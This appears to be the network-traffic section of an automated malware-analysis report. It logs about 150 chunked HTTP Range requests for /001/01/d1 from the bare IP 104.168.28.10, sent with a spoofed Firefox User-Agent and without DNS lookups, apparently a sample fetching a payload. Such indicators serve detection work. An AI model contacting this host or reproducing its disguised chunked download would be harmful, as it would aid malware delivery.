Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3946496-3962879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3962880-3995647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3995648-4003839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4003840-4005887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4005888-4022271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4022272-4024319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4024320-4089855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4089856-4093951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4093952-4110335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4110336-4114431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4114432-4122623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4130816-4163583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4163584-4171775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4171776-4188159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4188160-4204543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4204544-4212735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4212736-4245503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4245504-4249599User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4249600-4257791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4257792-4261887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4261888-4270079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4270080-4286463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4286464-4351999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4352000-4353023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4353024-4361215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4361216-4369407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4369408-4371455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4387840-4396031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4396032-4400127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4400128-4416511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4416512-4424703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4424704-4441087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4441088-4445183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4445184-4461567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4461568-4469759User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4469760-4473855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4473856-4482047User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4482048-4490239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4490240-4506623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4506624-4514815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4514816-4523007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4523008-4531199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4531200-4539391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4543488-4559871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4539392-4543487User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4559872-4576255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4576256-4609023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4609024-4625407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4625408-4658175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4658176-4690943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4690944-4695039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4695040-4697087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4697088-4705279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4705280-4709375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4709376-4713471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4713472-4779007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4779008-4787199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4787200-4795391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4795392-4803583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4805632-4809727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4803584-4805631User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4809728-4826111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4826112-4842495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4842496-4858879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4858880-4862975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4862976-4867071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4899840-4908031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4908032-4916223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4916224-4924415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4924416-4932607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4944896-4961279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4961280-4965375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4965376-4998143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4998144-5030911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5030912-5039103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5039104-5043199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5043200-5047295User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5047296-5051391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5051392-5067775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5067776-5075967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5075968-5084159 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5084160-5092351 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5092352-5094399 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5094400-5127167 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5127168-5143551 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5143552-5159935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5159936-5176319 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5176320-5192703 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5143552-5159935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5192704-5196799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5196800-5200895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5200896-5266431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5266432-5274623 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5274624-5307391 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5307392-5315583 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5315584-5348351 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5348352-5364735 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5364736-5381119 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5381120-5389311 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5389312-5405695 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5405696-5438463 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5438464-5471231 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5471232-5487615 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5487616-5503999 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5504000-5536767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5536768-5569535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5569536-5606383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.28.10 (50 identical entries in the report)
